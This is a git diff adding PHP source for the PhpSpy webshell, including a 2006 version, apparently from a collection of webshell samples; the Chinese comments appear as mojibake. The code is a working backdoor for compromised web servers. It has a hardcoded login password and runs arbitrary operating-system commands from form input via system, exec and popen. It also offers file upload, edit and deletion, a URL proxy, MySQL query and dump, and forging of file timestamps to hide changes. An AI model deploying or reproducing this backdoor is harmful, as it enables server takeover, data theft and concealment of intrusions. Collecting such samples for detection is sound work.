+    <td align="center" nowrap width="12%"><b>´óС</b></td>
+    <td align="center" nowrap width="7%"><b>ÊôÐÔ</b></td>
+    <td align="center" nowrap width="17%"><b>²Ù×÷</b></td>
+  </tr>
+<?php
+// Ŀ¼Áбí
+$dirs=@opendir($dir);
+while ($file=@readdir($dirs)) {
+	$filepath="$dir/$file";
+	$a=@is_dir($filepath);
+	if($a=="1"){
+		if($file!=".." && $file!=".")	{
+			$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
+			$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
+			$dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
+			echo "<tr class=".getrowbg().">\n";
+			echo "  <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
+			echo "  <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$ctime</td>\n";
+			echo "  <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$mtime</td>\n";
+			echo "  <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">&lt;dir&gt;</td>\n";
+			echo "  <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$dirperm</td>\n";
+			echo "  <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=deldir&dir=".urlencode($dir)."&deldir=".urlencode($file)."\">ɾ³ý</a></td>\n";
+			echo "</tr>\n";
+			$dir_i++;
+		} else {
+			if($file=="..") {
+				echo "<tr class=".getrowbg().">\n";
+				echo "  <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">·µ»ØÉϼ¶Ä¿Â¼</a></td>\n";
+				echo "</tr>\n";
+			}
+		}
+	}
+}//while
+@closedir($dirs); 
+?>
+<tr bgcolor="#cccccc">
+  <td colspan="6" height="5"></td>
+</tr>
+<?
+// ÎļþÁбí
+$dirs=@opendir($dir);
+while ($file=@readdir($dirs)) {
+	$filepath="$dir/$file";
+	$a=@is_dir($filepath);
+	if($a=="0"){
+		$size=@filesize($filepath);
+		$size=$size/1024 ;
+		$size= @number_format($size, 3);
+		
+		$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
+		$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
+		
+		@$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
+		echo "<tr class=".getrowbg().">\n";
+		echo "  <td style=\"padding-left: 5px;\"><a href=\"$filepath\" target=\"_blank\">$file</a></td>\n";
+		echo "  <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$ctime</td>\n";
+		echo "  <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$mtime</td>\n";
+		echo "  <td align=\"right\" nowrap valign=\"top\" class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
+		echo "  <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$fileperm</td>\n";
+		echo "  <td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlencode($filepath)."\">ÏÂÔØ</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">±à¼­</a> | <a href=\"?dir=".urlencode($dir)."&delfile=".urlencode($filepath)."\">ɾ³ý</a></td>\n";
+		echo "</tr>\n";
+		$file_i++;
+	}
+}
+@closedir($dirs); 
+?>
+<tr class="<?=getrowbg()?>">
+  <td nowrap colspan="6" align="right"><?=$dir_i?> ¸öĿ¼ / <?=$file_i?> ¸öÎļþ</td>
+    </tr>
+  </table></td>
+</tr>
+</table>
+
+<?php
+}// end dir
+
+elseif ($_GET['action'] == "editfile") {
+	if($newfile=="") {
+		$filename="$dir/$editfile";
+		$fp=@fopen($filename,"r");
+		$contents=@fread($fp, filesize($filename));
+		@fclose($fp);
+		$contents=htmlspecialchars($contents);
+	}else{
+		$editfile=$newfile;
+		$filename = "$dir/$editfile";
+	}
+?>
+<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
+  <tr class="firstalt">
+    <td align="center">н¨/±à¼­Îļþ [<a href="?dir=<?=urlencode($dir)?>">·µ»Ø</a>]</td>
+  </tr>
+  <form action="?dir=<?=urlencode($dir)?>" method="POST">
+  <tr class="secondalt">
+    <td align="center">µ±Ç°Îļþ:<input class="input" type="text" name="editfilename" size="30"
+value="<?=$filename?>"> ÊäÈëÐÂÎļþÃûÔò½¨Á¢ÐÂÎļþ</td>
+  </tr>  
+  <tr class="firstalt">
+    <td align="center"><textarea name="filecontent" cols="100" rows="20"><?=$contents?></textarea></td>
+  </tr>  
+  <tr class="secondalt">
+    <td align="center"><input type="submit" name="doeditfile" value="È·¶¨Ð´Èë" class="input">
+      <input type="reset" value="ÖØÖÃ" class="input"></td>
+  </tr>
+  </form>
+</table>
+<?php
+}//end editfile
+
+elseif ($_GET['action'] == "shell") {
+	if (!get_cfg_var("safe_mode")) {
+?>
+<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
+  <tr class="firstalt">
+    <td align="center">WebShell Mode</td>
+  </tr>
+  <form action="?action=shell&dir=<?=urlencode($dir)?>" method="POST">
+  <tr class="secondalt">
+    <td align="center">
+	  Ñ¡ÔñÖ´Ðк¯Êý:
+	  <select name="execfunc" class="input">
+		<option value="system" <? if ($execfunc=="system") { echo "selected"; } ?>>system</option>
+		<option value="passthru" <? if ($execfunc=="passthru") { echo "selected"; } ?>>passthru</option>
+		<option value="exec" <? if ($execfunc=="exec") { echo "selected"; } ?>>exec</option>
+		<option value="shell_exec" <? if ($execfunc=="shell_exec") { echo "selected"; } ?>>shell_exec</option>
+		<option value="popen" <? if ($execfunc=="popen") { echo "selected"; } ?>>popen</option>
+	  </select>¡¡
+	  ÊäÈëÃüÁî:
+      <input type="text" name="command" size="60" value="<?=$_POST['command']?>" class="input">
+      <input type="submit" value="execute" class="input"></td>
+  </tr>  
+  <tr class="secondalt">
+    <td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
+	if (!empty($_POST['command'])) {
+		if ($execfunc=="system") {
+			system($_POST['command']);
+		} elseif ($execfunc=="passthru") {
+			passthru($_POST['command']);
+		} elseif ($execfunc=="exec") {
+			$result = exec($_POST['command']);
+			echo $result;
+		} elseif ($execfunc=="shell_exec") {
+			$result=shell_exec($_POST['command']);
+			echo $result;	
+		} elseif ($execfunc=="popen") {
+			$pp = popen($_POST['command'], 'r');
+			$read = fread($pp, 2096);
+			echo $read;
+			pclose($pp);
+		} else {
+			system($_POST['command']);
+		}
+	}
+	?></textarea></td>
+  </tr>  
+  </form>
+</table>
+<?php
+	} else {
+?>
+<p><b>Safe_Mode ÒÑ´ò¿ª, ÎÞ·¨Ö´ÐÐϵͳÃüÁî.</b></p>
+<?php
+	}
+}//end shell
+
+elseif ($_GET['action'] == "deldir") {
+?>
+<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
+  <form action="?dir=<?=urlencode($dir)?>" method="POST">
+  <tr class="firstalt">
+    <td align="center">ɾ³ý <input name="deldir" type="text" value="<?=$deldir?>" class="input" readonly> Ŀ¼</td>
+  </tr>  
+  <tr class="secondalt">
+    <td align="center">×¢Òâ:Èç¹û¸ÃĿ¼·Ç¿Õ,´Ë´Î²Ù×÷½«»áɾ³ý¸ÃĿ¼ÏµÄËùÓÐÎļþ.ÄúÈ·¶¨Âð?</td>
+  </tr>  
+  <tr class="firstalt">
+    <td align="center">
+	  <input type="submit" name="rmdir" value="delete" class="input">
+	</td>
+  </tr>  
+  </form>
+</table>
+<?php
+}//end deldir
+
+elseif ($_GET['action'] == "sql") {
+	$servername = isset($servername) ? $servername : 'localhost';
+	$dbusername = isset($dbusername) ? $dbusername : 'root';
+	$dbpassword = isset($dbpassword) ? $dbpassword : '';
+	$dbname = isset($dbname) ? $dbname : '';
+?>
+<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
+  <tr class="firstalt">
+    <td align="center">Ö´ÐÐ SQL Óï¾ä</td>
+  </tr>
+  <form action="?action=sql" method="POST">
+  <tr class="secondalt">
+    <td align="center">Host:
+    <input name="servername" type="text" class="INPUT" value="<?=$servername?>"> 
+    User:
+    <input name="dbusername" type="text" class="INPUT" size="15" value="<?=$dbusername?>">
+    Pass:
+    <input name="dbpassword" type="text" class="INPUT" size="15" value="<?=$dbpassword?>">
+    DB:
+    <input name="dbname" type="text" class="INPUT" size="15" value="<?=$dbname?>">
+    <input name="connect" type="submit" class="INPUT" value="Á¬½Ó"></td>
+  </tr>
+  <tr class="firstalt">
+    <td align="center"><textarea name="sql_query" cols="85" rows="10"></textarea></td>
+  </tr>
+  <tr class="secondalt">
+    <td align="center"><input type="submit" name="doquery" value="Ö´ÐÐ" class="input"></td>
+  </tr>  
+  </form>
+</table>
+<?php
+}//end sql query
+
+elseif ($_GET['action'] == "phpenv") {
+?>
+<table width="760" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
+ <form action="?action=phpenv" method="POST">
+  <tr class="firstalt">
+    <td style="padding-left: 5px;"><b>²é¿´PHPÅäÖòÎÊý×´¿ö</b></td>
+  </tr>
+  <tr class="secondalt">
+    <td style="padding-left: 5px;">ÇëÊäÈëÅäÖòÎÊý(Èç:magic_quotes_gpc):<input name="phpvarname" type="text" class="input" size="40"> <input type="submit" name="viewphpvar" value="²é¿´" class="input"></td>
+  </tr>
+ </form>
+</table>
+<?php
+}//end phpenv
+?>
+<hr width="760" noshade>
+<table width="760" border="0" cellpadding="0">
+  <tr>
+    <td>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</td>
+    <td align="right"><?php
+	debuginfo();
+	ob_end_flush();	
+	?></td>
+  </tr>
+</table>
+</center>
+</body>
+</html>
+
+<?php
+
+/*======================================================
+º¯Êý¿â
+======================================================*/
+
+	// µÇ½Èë¿Ú
+	function loginpage() {
+?>
+		<style type="text/css">
+		input {
+			font-family: "Verdana";
+			font-size: "11px";
+			BACKGROUND-COLOR: "#FFFFFF";
+			height: "18px";
+			border: "1px solid #666666";
+		}
+		</style>
+		<form method="POST" action="">
+		<span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20">
+		<input type="submit" name="login" value="OK">
+		</form>
+<?php
+		exit;
+	}//end loginpage()
+
+	// Ò³Ãæµ÷ÊÔÐÅÏ¢
+	function debuginfo() {
+		global $starttime;
+		$mtime = explode(' ', microtime());
+		$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
+		echo "Processed in $totaltime second(s)";
+	}
+
+	// È¥µôתÒå×Ö·û
+	function stripslashes_array(&$array) {
+		while(list($key,$var) = each($array)) {
+			if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
+				if (is_string($var)) {
+					$array[$key] = stripslashes($var);
+				}
+				if (is_array($var))  {
+					$array[$key] = stripslashes_array($var);
+				}
+			}
+		}
+		return $array;
+	}
+
+	// ɾ³ýĿ¼
+	function deltree($deldir) {
+		$mydir=@dir($deldir);	
+		while($file=$mydir->read())	{ 		
+			if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) { 
+				@chmod("$deldir/$file",0777);
+				deltree("$deldir/$file"); 
+			}
+			if (is_file("$deldir/$file")) {
+				@chmod("$deldir/$file",0777);
+				@unlink("$deldir/$file");
+			}
+		} 
+		$mydir->close(); 
+		@chmod("$deldir",0777);
+		echo @rmdir($deldir) ? "Ŀ¼ɾ³ý³É¹¦!" : "<font color=\"#ff0000\">Ŀ¼ɾ³ýʧ°Ü!</font>";	
+	} 
+
+	// Åж϶ÁдÇé¿ö
+	function dir_writeable($dir) {
+		if (!is_dir($dir)) {
+			@mkdir($dir, 0777);
+		}
+		if(is_dir($dir)) {
+			if ($fp = @fopen("$dir/test.txt", 'w')) {
+				@fclose($fp);
+				@unlink("$dir/test.txt");
+				$writeable = 1;
+			} else {
+				$writeable = 0;
+			}
+		}
+		return $writeable;
+	}
+
+	// ±í¸ñÐмäµÄ±³¾°É«Ìæ»»
+	function getrowbg() {
+		global $bgcounter;
+		if ($bgcounter++%2==0) {
+			return "firstalt";
+		} else {
+			return "secondalt";
+		}
+	}
+
+	// »ñÈ¡µ±Ç°µÄÎļþϵͳ·¾¶
+	function getPath($mainpath, $relativepath) {
+		global $dir;
+		$mainpath_info           = explode('/', $mainpath);
+		$relativepath_info       = explode('/', $relativepath);
+		$relativepath_info_count = count($relativepath_info);
+		for ($i=0; $i<$relativepath_info_count; $i++) {
+			if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
+			if ($relativepath_info[$i] == '..') {
+				$mainpath_info_count = count($mainpath_info);
+				unset($mainpath_info[$mainpath_info_count-1]);
+				continue;
+			}
+			$mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
+		} //end for
+		return implode('/', $mainpath_info);
+	}
+
+	// ¼ì²éPHPÅäÖòÎÊý
+	function getphpcfg($varname) {
+		switch($result = get_cfg_var($varname)) {
+			case 0:
+			return No;
+			break;
+			case 1:
+			return Yes;
+			break;
+			default:
+			return $result;
+			break;
+		}
+	}
+?>
\ No newline at end of file
diff --git a/php/phpspy/phpspy_2006.php b/php/phpspy/phpspy_2006.php
new file mode 100644
index 0000000..d718723
--- /dev/null
+++ b/php/phpspy/phpspy_2006.php
@@ -0,0 +1,1309 @@
+<?php
+/*
++--------------------------------------------------------------------------+
+| str_replace(".", "", "P.h.p.S.p.y") Version:2006                         |
+| Codz by Angel                                                            |
+| (c) 2004 Security Angel Team                                             |
+| http://www.4ngel.net                                                     |
+| ======================================================================== |
+| Team:  http://www.4ngel.net                                              |
+|        http://www.bugkidz.org                                            |
+| Email: 4ngel@21cn.com                                                    |
+| Date:  Mar 21st 2005                                                     |
+| Thx All The Fantasy of Wickedness's members                              |
+| Thx FireFox (http://www.molyx.com)                                       |
++--------------------------------------------------------------------------+
+*/
+
+error_reporting(7);
+ob_start();
+$mtime = explode(' ', microtime());
+$starttime = $mtime[1] + $mtime[0];
+
+/*===================== ³ÌÐòÅäÖà =====================*/
+
+// ÊÇ·ñÐèÒªÃÜÂëÑéÖ¤,1ΪÐèÒªÑéÖ¤,ÆäËûÊý×ÖΪֱ½Ó½øÈë.ÏÂÃæÑ¡ÏîÔòÎÞЧ
+$admin['check'] = "1";
+
+// Èç¹ûÐèÒªÃÜÂëÑéÖ¤,ÇëÐ޸ĵǽÃÜÂë
+$admin['pass']  = "angel";
+
+/*===================== ÅäÖýáÊø =====================*/
+
+
+// ÔÊÐí³ÌÐòÔÚ register_globals = off µÄ»·¾³Ï¹¤×÷
+$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
+
+if ($onoff != 1) {
+	@extract($_POST, EXTR_SKIP);
+	@extract($_GET, EXTR_SKIP);
+}
+
+$self = $_SERVER['PHP_SELF'];
+$dis_func = get_cfg_var("disable_functions");
+
+
+/*===================== Éí·ÝÑéÖ¤ =====================*/
+if($admin['check'] == "1") {
+	if ($_GET['action'] == "logout") {
+		setcookie ("adminpass", "");
+		echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
+		echo "<span style=\"font-size: 12px; font-family: Verdana\">×¢Ïú³É¹¦......<p><a href=\"".$self."\">ÈýÃëºó×Ô¶¯Í˳ö»òµ¥»÷ÕâÀïÍ˳ö³ÌÐò½çÃæ &gt;&gt;&gt;</a></span>";
+		exit;
+	}
+
+	if ($_POST['do'] == 'login') {
+		$thepass=trim($_POST['adminpass']);
+		if ($admin['pass'] == $thepass) {
+			setcookie ("adminpass",$thepass,time()+(1*24*3600));
+			echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
+			echo "<span style=\"font-size: 12px; font-family: Verdana\">µÇ½³É¹¦......<p><a href=\"".$self."\">ÈýÃëºó×Ô¶¯Ìøת»òµ¥»÷ÕâÀï½øÈë³ÌÐò½çÃæ &gt;&gt;&gt;</a></span>";
+			exit;
+		}
+	}
+	if (isset($_COOKIE['adminpass'])) {
+		if ($_COOKIE['adminpass'] != $admin['pass']) {
+			loginpage();
+		}
+	} else {
+		loginpage();
+	}
+}
+/*===================== ÑéÖ¤½áÊø =====================*/
+
+// ÅÐ¶Ï magic_quotes_gpc ״̬
+if (get_magic_quotes_gpc()) {
+    $_GET = stripslashes_array($_GET);
+	$_POST = stripslashes_array($_POST);
+}
+
+// ²é¿´PHPINFO
+if ($_GET['action'] == "phpinfo") {
+	echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() º¯ÊýÒѱ»½ûÓÃ,Çë²é¿´&lt;PHP»·¾³±äÁ¿&gt;";
+	exit;
+}
+
+// ÔÚÏß´úÀí
+if (isset($_POST['url'])) {
+	$proxycontents = @file_get_contents($_POST['url']);
+	echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>»ñÈ¡ URL ÄÚÈÝʧ°Ü</b></p></center></body>";
+	exit;
+}
+
+// ÏÂÔØÎļþ
+if (!empty($downfile)) {
+	if (!@file_exists($downfile)) {
+		echo "<script>alert('ÄãҪϵÄÎļþ²»´æÔÚ!')</script>";
+	} else {
+		$filename = basename($downfile);
+		$filename_info = explode('.', $filename);
+		$fileext = $filename_info[count($filename_info)-1];
+		header('Content-type: application/x-'.$fileext);
+		header('Content-Disposition: attachment; filename='.$filename);
+		header('Content-Description: PHP Generated Data');
+		header('Content-Length: '.filesize($downfile));
+		@readfile($downfile);
+		exit;
+	}
+}
+
+// Ö±½ÓÏÂÔر¸·ÝÊý¾Ý¿â
+if ($_POST['backuptype'] == 'download') {
+	@mysql_connect($servername,$dbusername,$dbpassword) or die("Êý¾Ý¿âÁ¬½Óʧ°Ü");
+	@mysql_select_db($dbname) or die("Ñ¡ÔñÊý¾Ý¿âʧ°Ü");	
+	$table = array_flip($_POST['table']);
+	$result = mysql_query("SHOW tables");
+	echo ($result) ? NULL : "³ö´í: ".mysql_error();
+
+	$filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
+	header('Content-type: application/unknown');
+	header('Content-Disposition: attachment; filename='.$filename);
+	$mysqldata = '';
+	while ($currow = mysql_fetch_array($result)) {
+		if (isset($table[$currow[0]])) {
+			$mysqldata.= sqldumptable($currow[0]);
+			$mysqldata.= $mysqldata."\r\n";
+		}
+	}
+	mysql_close();
+	exit;
+}
+
+// ³ÌÐòĿ¼
+$pathname=str_replace('\\','/',dirname(__FILE__)); 
+
+// »ñÈ¡µ±Ç°Â·¾¶
+if (!isset($dir) or empty($dir)) {
+	$dir = ".";
+	$nowpath = getPath($pathname, $dir);
+} else {
+	$dir=$_GET['dir'];
+	$nowpath = getPath($pathname, $dir);
+}
+
+// Åж϶ÁдÇé¿ö
+$dir_writeable = (dir_writeable($nowpath)) ? "¿Éд" : "²»¿Éд";
+$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
+$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href=\"?action=reg\">×¢²á±í²Ù×÷</a>" : "";
+
+$tb = new FORMS;
+
+?>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
+<title>PhpSpy Ver 2006</title>
+<style type="text/css">
+body,td {
+	font-family: "Tahoma";
+	font-size: "12px";
+	line-height: "150%";
+}
+.smlfont {
+	font-family: "Tahoma";
+	font-size: "11px";
+}
+.INPUT {
+	FONT-SIZE: "12px";
+	COLOR: "#000000";
+	BACKGROUND-COLOR: "#FFFFFF";
+	height: "18px";
+	border: "1px solid #666666";
+	padding-left: "2px";
+}
+.redfont {
+	COLOR: "#A60000";
+}
+a:link,a:visited,a:active {
+	color: "#000000";
+	text-decoration: underline;
+}
+a:hover {
+	color: "#465584";
+	text-decoration: none;
+}
+.top {BACKGROUND-COLOR: "#CCCCCC"}
+.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
+.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
+</style>
+<SCRIPT language=JavaScript>
+function CheckAll(form) {
+	for (var i=0;i<form.elements.length;i++) {
+		var e = form.elements[i];
+		if (e.name != 'chkall')
+		e.checked = form.chkall.checked;
+    }
+}
+function really(d,f,m,t) {
+	if (confirm(m)) {
+		if (t == 1) {
+			window.location.href='?dir='+d+'&deldir='+f;
+		} else {
+			window.location.href='?dir='+d+'&delfile='+f;
+		}
+	}
+}
+</SCRIPT>
+</head>
+
+<body style="table-layout:fixed; word-break:break-all">
+<center>
+<?php
+$tb->tableheader();
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td align="right"><b>'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>','center','top');
+$tb->tdbody('<a href="?action=logout">×¢Ïú»á»°</a> | <a href="?action=dir">·µ»ØPhpSpyĿ¼</a> | <a href="?action=phpenv">PHP»·¾³±äÁ¿</a> | <a href="?action=proxy">ÔÚÏß´úÀí</a>'.$reg.$phpinfo.' | <a href="?action=shell">WebShell</a> | <a href="?action=sql">SQL Query</a> | <a href="?action=sqlbak">MySQL Backup</a>');
+$tb->tablefooter();
+?>
+<hr width="775" noshade>
+<table width="775" border="0" cellpadding="0">
+<?
+$tb->headerform(array('method'=>'GET','content'=>'<p>³ÌÐò·¾¶: '.$pathname.'<br>µ±Ç°Ä¿Â¼('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'<br>ÌøתĿ¼: '.$tb->makeinput('dir').' '.$tb->makeinput('','È·¶¨','','submit').' ¡¼Ö§³Ö¾ø¶Ô·¾¶ºÍÏà¶Ô·¾¶¡½'));
+
+$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'ÉÏ´«Îļþµ½µ±Ç°Ä¿Â¼: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','È·¶¨','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));
+
+$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'н¨ÎļþÔÚµ±Ç°Ä¿Â¼: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','È·¶¨','','submit')));
+
+$tb->headerform(array('content'=>'н¨Ä¿Â¼ÔÚµ±Ç°Ä¿Â¼: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','È·¶¨','','submit')));
+?>
+</table>
+<hr width="775" noshade>
+<?php
+/*===================== Ö´ÐвÙ×÷ ¿ªÊ¼ =====================*/
+echo "<p><b>\n";
+// ɾ³ýÎļþ
+if (!empty($delfile)) {
+	if (file_exists($delfile)) {
+		echo (@unlink($delfile)) ? $delfile." ɾ³ý³É¹¦!" : "Îļþɾ³ýʧ°Ü!";
+	} else {
+		echo basename($delfile)." ÎļþÒѲ»´æÔÚ!";
+	}
+}
+
+// ɾ³ýĿ¼
+elseif (!empty($deldir)) {
+	$deldirs="$dir/$deldir";
+	if (!file_exists("$deldirs")) {
+		echo "$deldir Ŀ¼ÒѲ»´æÔÚ!";
+	} else {
+		echo (deltree($deldirs)) ? "Ŀ¼ɾ³ý³É¹¦!" : "Ŀ¼ɾ³ýʧ°Ü!";
+	}
+}
+
+// ´´½¨Ä¿Â¼
+elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
+	if (!empty($newdirectory)) {
+		$mkdirs="$dir/$newdirectory";
+		if (file_exists("$mkdirs")) {
+			echo "¸ÃĿ¼ÒÑ´æÔÚ!";
+		} else {
+			echo (@mkdir("$mkdirs",0777)) ? "´´½¨Ä¿Â¼³É¹¦!" : "´´½¨Ê§°Ü!";
+			@chmod("$mkdirs",0777);
+		}
+	}
+}
+
+// ÉÏ´«Îļþ
+elseif ($doupfile) {
+	echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "ÉÏ´«³É¹¦!" : "ÉÏ´«Ê§°Ü!";
+}
+
+// ±à¼­Îļþ
+elseif ($_POST['do'] == 'doeditfile') {
+	if (!empty($_POST['editfilename'])) {
+		$filename="$editfilename";
+		@$fp=fopen("$filename","w");
+		echo $msg=@fwrite($fp,$_POST['filecontent']) ? "дÈëÎļþ³É¹¦!" : "дÈëʧ°Ü!";
+		@fclose($fp);
+	} else {
+		echo "ÇëÊäÈëÏëÒª±à¼­µÄÎļþÃû!";
+	}
+}
+
+// ±à¼­ÎļþÊôÐÔ
+elseif ($_POST['do'] == 'editfileperm') {
+	if (!empty($_POST['fileperm'])) {
+		$fileperm=base_convert($_POST['fileperm'],8,10);
+		echo (@chmod($dir."/".$file,$fileperm)) ? "ÊôÐÔÐ޸ijɹ¦!" : "ÐÞ¸Äʧ°Ü!";
+		echo " Îļþ ".$file." Ð޸ĺóµÄÊôÐÔΪ: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4);
+	} else {
+		echo "ÇëÊäÈëÏëÒªÉèÖõÄÊôÐÔ!";
+	}
+}
+
+// Îļþ¸ÄÃû
+elseif ($_POST['do'] == 'rename') {
+	if (!empty($_POST['newname'])) {
+		$newname=$_POST['dir']."/".$_POST['newname'];
+		if (@file_exists($newname)) {
+			echo "".$_POST['newname']." ÒѾ­´æÔÚ,ÇëÖØÐÂÊäÈëÒ»¸ö!";
+		} else {
+			echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." ³É¹¦¸ÄÃûΪ ".$_POST['newname']." !" : "ÎļþÃûÐÞ¸Äʧ°Ü!";
+		}
+	} else {
+		echo "ÇëÊäÈëÏëÒª¸ÄµÄÎļþÃû!";
+	}
+}
+
+// ¿Ë¡ʱ¼ä
+elseif ($_POST['do'] == 'domodtime') {
+	if (!@file_exists($_POST['curfile'])) {
+		echo "ÒªÐ޸ĵÄÎļþ²»´æÔÚ!";
+	} else {
+		if (!@file_exists($_POST['tarfile'])) {
+			echo "Òª²ÎÕÕµÄÎļþ²»´æÔÚ!";
+		} else {
+			$time=@filemtime($_POST['tarfile']);
+			echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." µÄÐÞ¸Äʱ¼ä³É¹¦¸ÄΪ ".date("Y-m-d H:i:s",$time)." !" : "ÎļþµÄÐÞ¸Äʱ¼äÐÞ¸Äʧ°Ü!";
+		}
+	}
+}
+
+// ×Ô¶¨Òåʱ¼ä
+elseif ($_POST['do'] == 'modmytime') {
+	if (!@file_exists($_POST['curfile'])) {
+		echo "ÒªÐ޸ĵÄÎļþ²»´æÔÚ!";
+	} else {
+		$year=$_POST['year'];
+		$month=$_POST['month'];
+		$data=$_POST['data'];		
+		$hour=$_POST['hour'];
+		$minute=$_POST['minute'];
+		$second=$_POST['second'];
+		if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) {
+			$time=strtotime("$data $month $year $hour:$minute:$second");
+			echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." µÄÐÞ¸Äʱ¼ä³É¹¦¸ÄΪ ".date("Y-m-d H:i:s",$time)." !" : "ÎļþµÄÐÞ¸Äʱ¼äÐÞ¸Äʧ°Ü!";
+		}
+	}
+}
+
+// Á¬½ÓMYSQL
+elseif ($connect) {
+	if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
+		echo "Êý¾Ý¿âÁ¬½Ó³É¹¦!";
+		mysql_close();
+	} else {
+		echo mysql_error();
+	}
+}
+
+// Ö´ÐÐSQLÓï¾ä
+elseif ($_POST['do'] == 'query') {
+	@mysql_connect($servername,$dbusername,$dbpassword) or die("Êý¾Ý¿âÁ¬½Óʧ°Ü");
+	@mysql_select_db($dbname) or die("Ñ¡ÔñÊý¾Ý¿âʧ°Ü");
+	$result = @mysql_query($_POST['sql_query']);
+	echo ($result) ? "SQLÓï¾ä³É¹¦Ö´ÐÐ!" : "³ö´í: ".mysql_error();
+	mysql_close();
+}
+
+// ±¸·Ý²Ù×÷
+elseif ($_POST['do'] == 'backupmysql') {
+	if (empty($_POST['table']) OR empty($_POST['backuptype'])) {
+		echo "ÇëÑ¡ÔñÓû±¸·ÝµÄÊý¾Ý±íºÍ±¸·Ý·½Ê½!";
+	} else {
+		if ($_POST['backuptype'] == 'server') {
+			@mysql_connect($servername,$dbusername,$dbpassword) or die("Êý¾Ý¿âÁ¬½Óʧ°Ü");
+			@mysql_select_db($dbname) or die("Ñ¡ÔñÊý¾Ý¿âʧ°Ü");	
+			$table = array_flip($_POST['table']);
+			$filehandle = @fopen($path,"w");
+			if ($filehandle) {
+				$result = mysql_query("SHOW tables");
+				echo ($result) ? NULL : "³ö´í: ".mysql_error();
+				while ($currow = mysql_fetch_array($result)) {
+					if (isset($table[$currow[0]])) {
+						sqldumptable($currow[0], $filehandle);
+						fwrite($filehandle,"\n\n\n");
+					}
+				}
+				fclose($filehandle);
+				echo "Êý¾Ý¿âÒѳɹ¦±¸·Ýµ½ <a href=\"".$path."\" target=\"_blank\">".$path."</a>";
+				mysql_close();
+			} else {
+				echo "±¸·Ýʧ°Ü,ÇëÈ·ÈÏÄ¿±êÎļþ¼ÐÊÇ·ñ¾ßÓпÉдȨÏÞ!";
+			}
+		}
+	}
+}
+
+// ´ò°üÏÂÔØ PS:ÎļþÌ«´ó¿ÉÄܷdz£Âý
+// Thx : С»¨
+elseif($downrar) {
+	if (!empty($dl)) {
+		$dfiles="";
+		foreach ($dl AS $filepath=>$value) {
+			$dfiles.=$filepath.",";
+		}
+		$dfiles=substr($dfiles,0,strlen($dfiles)-1);
+		$dl=explode(",",$dfiles);
+		$zip=new PHPZip($dl);
+		$code=$zip->out;		
+		header("Content-type: application/octet-stream");
